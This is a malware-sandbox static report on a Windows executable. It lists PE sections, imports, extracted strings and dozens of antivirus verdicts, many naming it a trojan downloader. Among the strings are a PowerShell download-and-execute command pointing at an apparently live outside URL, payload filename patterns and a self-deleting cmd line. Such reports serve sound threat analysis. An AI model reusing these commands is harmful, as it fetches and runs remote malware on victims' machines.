Static | ZeroBOX

PE Compile Time

2022-11-24 23:39:37

PE Imphash

cddebb8fa6c0a087547241e14a7bb869

Sections

Name Virtual Address Virtual Size Size of Raw Data Entropy
.text 0x00001000 0x0001c4f3 0x0001c600 6.42125535143
.rdata 0x0001e000 0x000076ae 0x00007800 5.03563340242
.data 0x00026000 0x0001ae04 0x0001a400 7.96091542434
.gfids 0x00041000 0x0000012c 0x00000200 1.53376534848
.tls 0x00042000 0x00000009 0x00000200 0.0203931352361
.rsrc 0x00043000 0x000001f0 0x00000200 2.72008570211
.reloc 0x00044000 0x000013e4 0x00001400 6.60148971511

Resources

Name Offset Size Language Sub-language File type
AFX_DIALOG_LAYOUT 0x000431e8 0x00000002 LANG_ENGLISH SUBLANG_ENGLISH_US data
RT_DIALOG 0x000430d0 0x00000112 LANG_ENGLISH SUBLANG_ENGLISH_US data

Imports

Library WININET.dll:
0x41e154 InternetReadFile
0x41e158 InternetCloseHandle
0x41e15c InternetCrackUrlW
0x41e160 InternetOpenW
0x41e164 InternetOpenUrlW
Library SHLWAPI.dll:
0x41e13c StrStrW
0x41e140 wnsprintfW
Library KERNEL32.dll:
0x41e00c SetFilePointerEx
0x41e010 GetConsoleMode
0x41e014 GetConsoleOutputCP
0x41e018 FlushFileBuffers
0x41e01c WriteFile
0x41e020 GetModuleFileNameW
0x41e028 CreateFileW
0x41e02c GetFileAttributesW
0x41e034 GetLastError
0x41e038 LoadLibraryA
0x41e03c WriteConsoleW
0x41e040 CloseHandle
0x41e044 ExitProcess
0x41e048 GetModuleHandleW
0x41e04c lstrcpyW
0x41e050 GetTempFileNameW
0x41e054 HeapFree
0x41e058 HeapReAlloc
0x41e05c HeapAlloc
0x41e060 GetProcessHeap
0x41e064 WideCharToMultiByte
0x41e068 HeapSize
0x41e06c GetStringTypeW
0x41e070 SetStdHandle
0x41e074 EncodePointer
0x41e078 lstrcatW
0x41e07c GetStartupInfoW
0x41e08c SetEvent
0x41e090 ResetEvent
0x41e098 CreateEventW
0x41e09c GetProcAddress
0x41e0a8 GetCurrentProcess
0x41e0ac TerminateProcess
0x41e0b4 IsDebuggerPresent
0x41e0b8 DecodePointer
0x41e0c0 GetCurrentProcessId
0x41e0c4 GetCurrentThreadId
0x41e0cc InitializeSListHead
0x41e0d0 RaiseException
0x41e0d8 TlsAlloc
0x41e0dc TlsGetValue
0x41e0e0 TlsSetValue
0x41e0e4 TlsFree
0x41e0e8 FreeLibrary
0x41e0ec LoadLibraryExW
0x41e0f0 SetLastError
0x41e0f4 RtlUnwind
0x41e0f8 GetModuleHandleExW
0x41e0fc GetStdHandle
0x41e100 FindClose
0x41e104 FindFirstFileExW
0x41e108 FindNextFileW
0x41e10c IsValidCodePage
0x41e110 GetACP
0x41e114 GetOEMCP
0x41e118 GetCPInfo
0x41e11c GetCommandLineA
0x41e120 GetCommandLineW
0x41e124 MultiByteToWideChar
0x41e130 LCMapStringW
0x41e134 GetFileType
Library USER32.dll:
0x41e148 wsprintfW
0x41e14c MessageBoxA
Library ADVAPI32.dll:
0x41e000 GetSidSubAuthority

!This program cannot be run in DOS mode.
aRichf
`.rdata
@.data
.gfids
@.reloc
t'ht;B
YYPh==B
PQQQSVW
PQQQSVW
URPQQh
;t$,v-
UQPXY]Y[
t4hx0A
zSSSSj
f9:t!V
j$h`KB
QQSVj8j@
PPPPPPPP
PPPPPWS
PP9E u:PPVWP
QQSVWd
j8h(MB
Unknown exception
bad allocation
InitializeConditionVariable
SleepConditionVariableCS
WakeAllConditionVariable
bad array new length
FlsAlloc
FlsFree
FlsGetValue
FlsSetValue
InitializeCriticalSectionEx
__based(
__cdecl
__pascal
__stdcall
__thiscall
__fastcall
__vectorcall
__clrcall
__eabi
__ptr64
__restrict
__unaligned
restrict(
delete
operator
`vftable'
`vbtable'
`vcall'
`typeof'
`local static guard'
`string'
`vbase destructor'
`vector deleting destructor'
`default constructor closure'
`scalar deleting destructor'
`vector constructor iterator'
`vector destructor iterator'
`vector vbase constructor iterator'
`virtual displacement map'
`eh vector constructor iterator'
`eh vector destructor iterator'
`eh vector vbase constructor iterator'
`copy constructor closure'
`udt returning'
`local vftable'
`local vftable constructor closure'
new[]
delete[]
`omni callsig'
`placement delete closure'
`placement delete[] closure'
`managed vector constructor iterator'
`managed vector destructor iterator'
`eh vector copy constructor iterator'
`eh vector vbase copy constructor iterator'
`dynamic initializer for '
`dynamic atexit destructor for '
`vector copy constructor iterator'
`vector vbase copy constructor iterator'
`managed vector copy constructor iterator'
`local static thread guard'
operator ""
Type Descriptor'
Base Class Descriptor at (
Base Class Array'
Class Hierarchy Descriptor'
Complete Object Locator'
CorExitProcess
Sunday
Monday
Tuesday
Wednesday
Thursday
Friday
Saturday
January
February
August
September
October
November
December
MM/dd/yy
dddd, MMMM dd, yyyy
HH:mm:ss
 !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
AreFileApisANSI
FlsAlloc
FlsFree
FlsGetValue
FlsSetValue
InitializeCriticalSectionEx
LCMapStringEx
LocaleNameToLCID
AppPolicyGetProcessTerminationMethod
?5Wg4p
%S#[k=
"B <1=
_hypot
_nextafter
ACSWKDUFRIRPAHUEAMOJGGZYRLZYTBH
FUHIWPDGXYMVJGAOVQLSBTHHPL
UKOVIWOMJNPQMJRRGKPIWUBECYFEHXSXNSA
ADNLTXBONKVAZEZTNMRBIWKYTFVHJYZANLXDEGGGWMDMNBBJONKWLBABDTLFIE
MUUUJEMXWFCRIWQAQWWQJCRBJCTQCKRJBWYPOZIAYOVDGTYSJMMWNKQQIBAHERQXFNXPXGWDSOVJMNJULEHWRCDK
VGDUJLTHZLLWGZVIFVCSSHDAFZNZEQRJRSJDIKVFYCYNFRQEXJWLTDYYKKDWQOMODUPFOZKKVUHVUQDQXUTIJDXIOPLOWRIAXZ
SKCQAEVNPZSOFSSJSZAJSHHNQLCYEVYSMOMERFBCGPURZXOZGZOOHCKBJAOXFQZ
YOXRMFGAKZTHSOFWNSEKDFQLTIERPWDYUTDYKMWEOPDJPEZHWBTTMJSRQJMGDVQAOZTERLXBMSCWFRWHXZFGVIPSNQVGUUKGOH
YDWNCEXSKVTPQIFKNCDEGUQJQFZZDSMFSPQONQWH
VVBANBJRIUBUNWOWHHDTFSOLRTALLTFWZBLLGDHLKXPPKXBVPBPSIGCBSEQYGIUDNMLJNUHBDVIYKXA
AYERNOURWYTVBXKCLAXTZVZBRWQCQLWZBTLOSRCEUCECVSFZLNMNPCIWDIOLCHPRUWIHJVMBEDRGVCIPHOO
KBXTCOSNZPFRFPJZAJZACGHXZNIIDSXIZEE
PNIDPNHUVPWT
TNZHLTLCNFLQNRTFCNTTYKGZVMZMNETSTHKGGCRGDACKHIAMHRJJWVIYXXJOAQPSESYAQAASVXE
PLDEAARBDMYOARZ
BAHAVPYJA
BUICEHF
FVYDASWALMHBAXOLECJLLAUZGFFQNNPIFYXNSNYFPAWYBGIKNIWWTEPUHTQZEXERBRWQWQKZCIHTOWUSWQMCWBNIOSPZCUX
RNPUNNJVJNTWCNNPXWMXPTBUQLRWBNGEILAPPWEJEMCKUVDFTUWQLXMEUODMJWZUXTGBRFBWCMZDTUHAVSDPSNRQW
OTRZYXTTMJCXTRQNSVJZARQECQMHCCCSVIFGZZJFUTGDFTMOVLNGXUVANFOAWNOJRNANSNTDIMGWFFIL
BRSUGIKVTVTGLMWZKSYGAAFVNDSYGYIZNWJDMUYZEEEKX
VPKQTKYLXAGEMYHWQDUVHGCUOZEXFXKVUBNYAMHRGPGIPVZWENYZIYOPGNNZKJUURORJOKHVCTHBQDXTV
ISDDSYSOYRHSXNESBBURBGVLTLBHGTLQMDBILQGAMOOQOECVNPZIPKAWCLWQWQM
KHINFARTUWCWZTYXKGDSRPAPFQU
UBHZKHFQLTQEBFLMYBZGGBRRILZTONGVNQYCVDAMINOOJKY
JWDKOZ
KXCTKUQQIIAHJADJQZRAVEBVHKAYIKXFWQRZIIOQYHAGBRNXVWDJXVLOVZWWFPCUJEFWMKBTGAHRBMGRX
UQECUPPYVJVSVBCZWIBASKDQGZRTTMEKYFCKCWPNNMIQVJCRTHXSVWCCOYPOUZTGGKVGECRPRRYTY
FCOTTZTMETHBGKPXNJNXIVOEFQXCASUWQJVFRIJKGCXKUOLIEXMACTSNJKIFTXVQNBSFNHPBUEMNMNXOMEANWSPDZXTFSWAX
ILXBVLBSIPIJMJQDHDNQWOCGLHIUEZBWJICVJVZOWQGHODPAGDWKXJUKUTRWDSCFWLFRKMNICAFVISKPXOANHHBRZOVJ
UHFOIKFEARTMRIZAETJQJRFKFEMHYTAAVCUNGJMLXVCNUIPNQRYHZOXNPUNJKVMPFMGAKGSBCJUDVBCMQVNKYNFWBBQAU
QQQZCMPTXSTND
AXDKGUIJIWRRSCGNLLIFCJLKOQXAPXCREXYVFVEDFGDHIUXLOCTCXVQERLXITKKGSQA
ULUQEISOWPXBKBZSNXYQLPCKZAXUPVHHFXUILPVONNWGZGKJCARLAEKP
HLEYAEDVCS
RGEFXHBKLXUDKAMBAQXAYYMDMQNOWSHMUUUDTPJCQDUETBIHRAZWQYMTHJIWYTVJGZC
FVNLIXSYCZTBK
UOCDRFOAPQYUMGFCJRULJBDGZRTSNNCTJMKNWEDTEDRERMFNVHSXCSFYMSQPBGYGRIJYHMJQCXSBVWBK
WAWAXEFOHGBZFLSHFAZDISZY
RRVBGNGPSAMGCCZXIVWLSPYTMLPLEGWIVE
IULJKBMRZNSDPNRAZBRSECRNKRTKMBTISBLRYJXZJJELGBLTTSWAYVOJHFWCBJVKFTDYDAOABTNMXJLVKHNGKOWQTL
FZQIAEYJVIWCYTRRBDACSJPPCPKUNODHDZPPJTMETXCQYMVRTQRUCEJLZLAGU
EHZTAEHFHFHEZTMWQSRWXBQECWUGNRTWPOXBKZBMT
RSQAKZK
OpenProcessToken
GetTokenInformation
CloseHandle
CreateJobObjectW
CreateMutexW
GetLastError
ExitProcess
shell32
GetModuleFileNameW
ExpandEnvironmentStringsW
string too long
invalid string position
map/set<T> too long
06:39:36
bad exception
.text$di
.text$mn
.text$x
.text$yd
.idata$5
.00cfg
.CRT$XCA
.CRT$XCAA
.CRT$XCU
.CRT$XCZ
.CRT$XIA
.CRT$XIAA
.CRT$XIAC
.CRT$XIC
.CRT$XIZ
.CRT$XLA
.CRT$XLZ
.CRT$XPA
.CRT$XPX
.CRT$XPXA
.CRT$XPZ
.CRT$XTA
.CRT$XTZ
.rdata
.rdata$T
.rdata$r
.rdata$sxdata
.rdata$zzzdbg
.rtc$IAA
.rtc$IZZ
.rtc$TAA
.rtc$TZZ
.xdata$x
.idata$2
.idata$3
.idata$4
.idata$6
.data$r
.gfids$y
.tls$ZZZ
.rsrc$01
.rsrc$02
InternetQueryDataAvailable
InternetOpenUrlW
InternetOpenW
InternetCrackUrlW
InternetCloseHandle
InternetReadFile
WININET.dll
wnsprintfW
StrStrW
SHLWAPI.dll
WriteFile
GetModuleFileNameW
GetEnvironmentVariableW
CreateFileW
GetFileAttributesW
GetSystemWow64DirectoryW
GetLastError
LoadLibraryA
lstrcatW
CloseHandle
ExitProcess
GetModuleHandleW
lstrcpyW
GetTempFileNameW
HeapFree
HeapReAlloc
HeapAlloc
GetProcessHeap
WideCharToMultiByte
KERNEL32.dll
wsprintfW
MessageBoxA
USER32.dll
GetSidSubAuthority
GetSidSubAuthorityCount
ADVAPI32.dll
EnterCriticalSection
LeaveCriticalSection
DeleteCriticalSection
SetEvent
ResetEvent
WaitForSingleObjectEx
CreateEventW
GetProcAddress
UnhandledExceptionFilter
SetUnhandledExceptionFilter
GetCurrentProcess
TerminateProcess
IsProcessorFeaturePresent
IsDebuggerPresent
GetStartupInfoW
QueryPerformanceCounter
GetCurrentProcessId
GetCurrentThreadId
GetSystemTimeAsFileTime
InitializeSListHead
RaiseException
InitializeCriticalSectionAndSpinCount
TlsAlloc
TlsGetValue
TlsSetValue
TlsFree
FreeLibrary
LoadLibraryExW
SetLastError
RtlUnwind
GetModuleHandleExW
GetStdHandle
FindClose
FindFirstFileExW
FindNextFileW
IsValidCodePage
GetACP
GetOEMCP
GetCPInfo
GetCommandLineA
GetCommandLineW
MultiByteToWideChar
GetEnvironmentStringsW
FreeEnvironmentStringsW
LCMapStringW
GetFileType
SetStdHandle
GetStringTypeW
HeapSize
FlushFileBuffers
GetConsoleOutputCP
GetConsoleMode
SetFilePointerEx
WriteConsoleW
EncodePointer
DecodePointer
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
CiCCPICC profile
v/{LSCs
k<abi2
;t;|rtu
/^v^Y^
{`:>=e
tEXtSoftware
Adobe ImageReadyq
%iTXtXML:com.adobe.xmp
<?xpacket begin="
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 6.0-c006 79.164753, 2021/02/15-11:52:13 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 22.3 (Macintosh)" xmpMM:InstanceID="xmp.iid:F24FDFF99C8011EB8C3EBF6E288275F4" xmpMM:DocumentID="xmp.did:F24FDFFA9C8011EB8C3EBF6E288275F4"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:F24FDFF79C8011EB8C3EBF6E288275F4" stRef:documentID="xmp.did:F24FDFF89C8011EB8C3EBF6E288275F4"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>
,qK>Sa
gXd:4a
kDYGaz
''`1fF
}vL{wv{
_C<=}7o
gkid
_Herz2
F>8m}^kU
*4rnQR
JyvUD'u
G8t0-
@)8p ]
_ci6~_
bZ_W$X
:BYNKA
cMN5"-Bo
jsP`MBD
|fGS 4
B/[&;V
-E"{ok
%<)B-
E:08z$
YI:]>'I
,%@d^E)
kp6mLsT
^^_=Y`;
`WeQc-
Sj9V^.
QkDv_N
6pj:D=N
%k4Y%9O
:w{L6(
*m*qbnE
bhKA>f
RavQ(
+qdR<%
}.{-MN4oYo*
i4241x
>G$I:A
U+_h.n-HfK
=W'pt:D
Fs}-:H
%#4Ndl3id
#W8'YdZ/
Tvt`Sg5<6
8^yi7~
QTbGq){
9|Z;=-
pf%uA5
:TUt`w
#'ZXl(
2[r:QZU
(GKS36V.
hgDN!h
.|s{3*
U-F}E%
[6Cs{U>
G&n|Kd
@LIg`nmDGg
~<E^t0
Le9h^)K\
N#kI+!
n&wXsW
#QYG>7
8?URXJ
is09P\^
+-C}Y9
Esc+vm
3XH/<n
[Pe1`8
W`V4J9
YQun9]t
.:`^=`
qtY-b
gY.y?hYV
<3uG
7/TQ2H
880hkc
s!Q>:l)
3ka']lF
F4Dc6c
|;8k?f-=
+C[[p&
+qnc,RJ
7qGJANF8
/w\f?A
8-Pc?[v
}dMUkx
lUWd?f
uj7j;/
5-_H*jq
+%]$(
o[v;
dVa4*k
8mZ/gh
{TZ40_
yT9t.;
9L`9~>N?g
*\1(WTV
euU?-Z
JiCAsz
HW7%|z
0ZJIRQQ
*N?u/~
'Amp'n~
o|'HY
I{=6l|
,ch6S+
r%\rIH#
Mzm1|&m
UhllD<
~rb,Kc
N:O>MX
p>;By(
}~Th.Te]
}3#b9_
y$D8g-
d"""b0
`&""""b0
f"""""
f"""""
`&""""b0
f"""""b0
f"""""
`&""""b0
`&""""b0
f"""""
LDDDDD
f"""""
`&""""b0
f"""""b0
DDDDDo
en^&"""
NSGMM%
F1{b5f
?"""b0
DDDDDD
f"""""
LDDDDtF
`&"""b0
^/dYf0
ODDDDt
f"""""
`&""""b0
f"""""b0
Y"""b0
FgK/\u
c{g7v<
`(8E2K
`k~DB!
h\be,
fbbLF>
f"""""
`&"""":
`&""""b0
f"""""
LDDDDD
f"""""
@F-Euu
#(K@@{
b,sOF9Ld
z&""b0
HU 0n9
Q[0%Qf
*'"":F
UhllD<
LtR0gz
lVqg<"""b0
$""""b0
f"""""
"""b0
h&"""b0
""""b0
f"""""
`&""""b0
`&""""b0
cOs/R&
X&""zE
P/C>=&g
'<@Gk']
RHaA'n
.P|CH[
5bPyX{]
y$YUbwUr
L\0G^
f*aza&
XF{h<x
f!b"A?
Lcvy1E)
.~FUG!
_r'gBi
'xhS;=
cg+vO
{GI/-e
$h4bs%
pj*i)q
u,|zLQ
.*vc2X
<n"EEEd'
i;BM};
z^?<FF
YaNfNT
_B4i1&,
,2b#0X"
NXIO+&
~d;{ku
]\rI%9
0+k4a4
Y|Dbb"qqq
E11d&X
aJN$20
3IIIbV~
L;]J"s
.?AVbad_alloc@std@@
.?AVexception@std@@
.?AVlogic_error@std@@
.?AVlength_error@std@@
.?AVout_of_range@std@@
.?AVtype_info@@
.?AVbad_array_new_length@std@@
.?AVbad_exception@std@@
0#0<0U0q0
4*444>4H4S4b4u4
5,6D6p6v6
7(7C7T7e7
8&8,8N8T8z8
9$9+9<9
9':5:F:S:c:p:}:
;T;Z;a;r;
;5<B<L<\<j<w<
=Q=W=^=o=
=+>1>t>
>8?L?_?l?y?
60<0C0T0
0(151_1
282I2V2g2
2@3F3M3|3
3(4.4P4V4x4~4
5R5X5_5
676=6_6e6{6
7#7i7o7
8 8B8H8j8p8
99/9@9r9
:::@:x:
;%;6;E;[;
<&<:<I<]<n<
=-=A=n=
>$>=>S>b>q>
0?0H0|0
3,3E3Z4s4
7K7n7~7
8+8E8q8
8989E9d9
:0:`:j:
<5<L<d<
7U8T;f;
2V3h314
1 131?1N1S1\1u1{1
2"2-252?2Q2W2]2c2i2s2}2
3!3'3-333:3A3H3O3V3]3d3l3t3|3
4"4(4.444:4A4H4O4V4]4d4k4s4{4
6+6Q6f6m6s6
6!7)7B7
738a8r8w8|8
;%;f;l;
<#<><I<
<3=B=I=
=:>U>a>p>y>
?*?3?9?A?F?l?q?
6/6;6w6
777G7L7Q7x7
7&82878<8l8t8y8
=)=3===K=f=w=
>%>1>H?|?
7+7:7O7Y7l7s7
9,9>9M9
=->N>i>y>~>
2&2C2|2
3)3:3?3h3v3}3
6?6H6P6m6T7Z7l7
=/=D=V=c=|=
>5><>]>
?!?6?@?c?m?
00:0A0
:@;G;N;U;o;~;
<=<e<T>w>
?g?p?t?z?~?
5"52575<5L5Q5V5{5
696B6z6
77:7D7T7Y7^7y7
909<9I9P9Z9p9
9/:f:x:
:3;C;t;
=1>:>R>~>
2$2G2b2o2}2
4*414M4T4k4
5'5W5`5
6#656G6Y6z6
4 4B4c4
7+7^7{7
::6:L:Y:^:l:
;Q<c<u<
Q0p0|0
5 5.5a5
67$7i7q7y7
818=8I8i8
9*9=:n:
>k>l?|?
0(0.070q0
1\1e1n1w1
7*7@7H7
:!:%:):-:1:t:
=K=P=T=X=\=
2 3#444O6
p1x1|1
2 2$2(2,2
4 4$4(4,4044484<4@4D4H4L4P4T4X4\4`4d4h4l4p4t4x4|4
5 5$5(5,5054585<5@5D5H5L5P5T5X5\5`5d5h5l5p5t5x5|5
5 <(<0<4<8<<<@<D<H<L<T<X<\<`<d<h<l<p<|<
> >$>(>,>0>4>8><>@>D>H>L>P>T>X>\>`>d>h>l>p>t>x>|>
? ?$?(?,?0?4?8?<?@?D?H?L?P?T?X?\?`?d?h?
; ;$;(;,;0;4;8;<;@;D;H;L;P;T;X;\;
$1,141<1D1L1T1\1d1l1t1|1
2$2,242<2D2L2T2\2d2l2t2|2
3$3,343<3D3L3T3\3d3l3t3|3
4$4,444<4D4L4T4\4d4l4t4|4
5$5,545<5D5L5T5\5d5l5t5|5
6$6,646<6D6L6T6\6d6l6t6|6
7$7,747<7D7L7T7\7d7l7t7|7
8$8,848<8
@2H2P2X2`2h2p2x2
3 3(30383@3H3P3X3`3h3p3x3
4 4(40484@4H4P4X4`4h4p4x4
5 5(50585@5H5P5X5`5h5p5x5
6 6(60686@6H6P6X6`6h6p6x6
7 7(70787@7H7P7X7`7h7p7x7
8 8(80888@8H8P8X8`8h8p8x8
9 9(90989@9H9P9X9
j3n3r3v3l<t<|<
=$=,=4=<=D=L=
0 0$04080<0D0\0l0p0
1 1$1(101H1X1\1l1p1x1
6L6`6p6
6 707<7D7x7
7(888@8H8P8T8\8p8x8
9 9<9@9\9`9h9p9x9|9
:8:X:t:x:
;8;X;x;
<8<X<x<
= =$=@=H=L=d=h=
7 7$7(7,7074787<7
X2\2`2d2h2l2p2t2x2|2
Aadvapi32
api-ms-win-core-fibers-l1-1-1
api-ms-win-core-synch-l1-2-0
kernel32
mscoree.dll
Sunday
Monday
Tuesday
Wednesday
Thursday
Friday
Saturday
January
February
August
September
October
November
December
MM/dd/yy
dddd, MMMM dd, yyyy
HH:mm:ss
((((( H
((((( H
(
Aja-JP
Bapi-ms-win-core-datetime-l1-1-1
api-ms-win-core-fibers-l1-1-1
api-ms-win-core-file-l1-2-2
api-ms-win-core-localization-l1-2-1
api-ms-win-core-localization-obsolete-l1-2-0
api-ms-win-core-processthreads-l1-1-2
api-ms-win-core-string-l1-1-0
api-ms-win-core-synch-l1-2-0
api-ms-win-core-sysinfo-l1-2-1
api-ms-win-core-winrt-l1-1-0
api-ms-win-core-xstate-l2-1-0
api-ms-win-rtcore-ntuser-window-l1-1-0
api-ms-win-security-systemfunctions-l1-1-0
ext-ms-win-ntuser-dialogbox-l1-1-0
ext-ms-win-ntuser-windowstation-l1-1-0
advapi32
kernel32
api-ms-win-appmodel-runtime-l1-1-2
user32
api-ms-
ext-ms-
zh-CHS
az-AZ-Latn
uz-UZ-Latn
kok-IN
syr-SY
div-MV
quz-BO
sr-SP-Latn
az-AZ-Cyrl
uz-UZ-Cyrl
quz-EC
sr-SP-Cyrl
quz-PE
smj-NO
bs-BA-Latn
smj-SE
sr-BA-Latn
sma-NO
sr-BA-Cyrl
sma-SE
sms-FI
smn-FI
zh-CHT
az-az-cyrl
az-az-latn
bs-ba-latn
div-mv
kok-in
quz-bo
quz-ec
quz-pe
sma-no
sma-se
smj-no
smj-se
smn-fi
sms-fi
sr-ba-cyrl
sr-ba-latn
sr-sp-cyrl
sr-sp-latn
syr-sy
uz-uz-cyrl
uz-uz-latn
zh-chs
zh-cht
CONOUT$
advapi32.dll
kernelbase.dll
kernel32.dll
mpr.dll
mscoree.dll
msvcrt.dll
ntdll.dll
user32.dll
winmm.dll
shell32.dll
Klocalappdata
/c ping 127.0.0.1 && del "%s" >> NUL
ComSpec
iuylu7lkuykuy
%SYSTEMROOT%\Microsoft.NET\Framework\v4.0.30319\csc.exe
%SYSTEMROOT%\Microsoft.NET\Framework\v2.0.50727\csc.exe
%ComSpec%
config_20.ps1
config_40.ps1
\system32
%s\sysnative\%s
https://e-hemsire.net/data/avatars
/c "powershell -command IEX(New-Object Net.Webclient).DownloadString('%s/%s')"
%s/ab%d.exe
%s/ab%d.php
AFX_DIALOG_LAYOUT
Dialog
MS Shell Dlg
Static
Check1
Button1
Antivirus Signature
Bkav W32.AIDetect.malware1
Lionic Trojan.Win32.PsDownload.4!c
Elastic malicious (high confidence)
MicroWorld-eScan Gen:Variant.Fragtor.165066
FireEye Generic.mg.0db52d1259097e34
CAT-QuickHeal Clean
ALYac Gen:Variant.Fragtor.165066
Cylance Unsafe
Zillya Clean
Sangfor Suspicious.Win32.Save.a
K7AntiVirus Clean
BitDefender Gen:Variant.Fragtor.165066
K7GW Clean
CrowdStrike win/malicious_confidence_90% (W)
Baidu Clean
VirIT Clean
Cyren W32/Agent.FIK.gen!Eldorado
Symantec ML.Attribute.HighConfidence
tehtris Clean
ESET-NOD32 a variant of Win32/Kryptik.HROL
APEX Malicious
Paloalto Clean
ClamAV Clean
Kaspersky UDS:Trojan-Downloader.Win32.PsDownload.gen
Alibaba Trojan:Win32/Kryptik.16a94327
NANO-Antivirus Clean
ViRobot Clean
Rising Downloader.Agent!1.E11E (CLASSIC)
Ad-Aware Gen:Variant.Fragtor.165066
TACHYON Clean
Sophos Mal/Generic-S
Comodo Clean
F-Secure Clean
DrWeb Clean
VIPRE Gen:Variant.Fragtor.165066
TrendMicro Clean
McAfee-GW-Edition BehavesLike.Win32.Shohdi.dc
Trapmine malicious.high.ml.score
CMC Clean
Emsisoft Gen:Variant.Fragtor.165066 (B)
Ikarus Clean
GData Gen:Variant.Fragtor.165066
Jiangmin Clean
Webroot Clean
Google Detected
Avira Clean
Antiy-AVL Clean
Kingsoft Win32.Troj.Undef.(kcloud)
Gridinsoft Clean
Arcabit Trojan.Fragtor.D284CA
SUPERAntiSpyware Clean
ZoneAlarm Clean
Microsoft Trojan:Win32/Sabsik.FL.B!ml
Cynet Malicious (score: 100)
AhnLab-V3 Malware/Win.Generic.C5305911
Acronis suspicious
McAfee GenericRXUR-YL!0DB52D125909
MAX malware (ai score=82)
VBA32 BScope.TrojanPSW.Coins
Malwarebytes Malware.AI.521605979
Panda Clean
Zoner Clean
TrendMicro-HouseCall Clean
Tencent Clean
Yandex Clean
SentinelOne Clean
MaxSecure Trojan.Malware.300983.susgen
Fortinet Clean
BitDefenderTheta Gen:NN.ZexaF.34796.qCW@aWkhyeoi
AVG Win32:CrypterX-gen [Trj]
Cybereason malicious.259097
Avast Win32:CrypterX-gen [Trj]
No IRMA results available.